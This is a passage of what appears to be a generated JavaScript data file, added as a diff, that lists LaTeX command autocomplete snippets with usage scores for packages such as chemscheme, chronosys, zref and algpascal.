'\\pagecolor{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + ], + chemscheme: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemscheme-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chemscheme-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemscheme-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + 
snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemscheme-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemscheme-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemscheme-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemscheme-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemscheme-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + ], + 'pst-all': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-all-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-all-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-all-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-all-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-all-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-all-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-all-cmd', + score: 0.006520475264573554, + }, + ], + regexpatch: [ + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'regexpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'regexpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'regexpatch-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'regexpatch-cmd', + score: 0.2864294797053033, + }, + ], + chronosys: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 
'chronosys-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chronosys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chronosys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chronosys-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronosys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chronosys-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chronosys-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chronosys-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chronosys-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chronosys-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.0014120076489723356, + }, + { + 
caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronosys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chronosys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronosys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chronosys-cmd', + score: 0.2864294797053033, + }, + ], + newfloat: [ + { + caption: '\\DeclareFloatingEnvironment[]{}', + snippet: '\\DeclareFloatingEnvironment[$1]{$2}', + meta: 'newfloat-cmd', + score: 2.603029874713569e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'newfloat-cmd', + score: 0.00037306820619479756, + }, + ], + zref: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + ], + bmpsize: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bmpsize-cmd', 
+ score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bmpsize-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bmpsize-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bmpsize-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bmpsize-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bmpsize-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bmpsize-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bmpsize-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bmpsize-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bmpsize-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bmpsize-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'bmpsize-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'bmpsize-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + ], + steinmetz: [ + { + caption: '\\Line', + snippet: '\\Line', + meta: 'steinmetz-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'steinmetz-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'steinmetz-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'steinmetz-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'steinmetz-cmd', + score: 0.002970308722584179, + }, + ], + pageslts: [ + { + caption: '\\thepage', + snippet: '\\thepage', + meta: 'pageslts-cmd', + score: 0.0591555998103519, + }, + { 
+ caption: '\\pagenumbering{}', + snippet: '\\pagenumbering{$1}', + meta: 'pageslts-cmd', + score: 0.06731737633021802, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'pageslts-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'pageslts-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'pageslts-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'pageslts-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'pageslts-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'pageslts-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pageslts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pageslts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pageslts-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pageslts-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + ], + chronology: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chronology-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chronology-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'chronology-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'chronology-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chronology-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'chronology-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + 
snippet: '\\addtolength{$1}{$2}', + meta: 'chronology-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'chronology-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chronology-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chronology-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chronology-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronology-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chronology-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chronology-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chronology-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chronology-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chronology-cmd', + score: 
0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chronology-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chronology-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronology-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chronology-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chronology-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + ], + spreadtab: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'spreadtab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'spreadtab-cmd', + score: 0.021170869458413965, + }, + ], + algpascal: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algpascal-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algpascal-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algpascal-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algpascal-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algpascal-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algpascal-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algpascal-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algpascal-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algpascal-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algpascal-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algpascal-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: 
'\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algpascal-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algpascal-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algpascal-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algpascal-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algpascal-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algpascal-cmd', + score: 0.0018957469739775527, + }, + ], + cabin: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'cabin-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cabin-cmd', + score: 0.008565354665444157, + }, + ], + erewhon: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'erewhon-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'erewhon-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'erewhon-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: 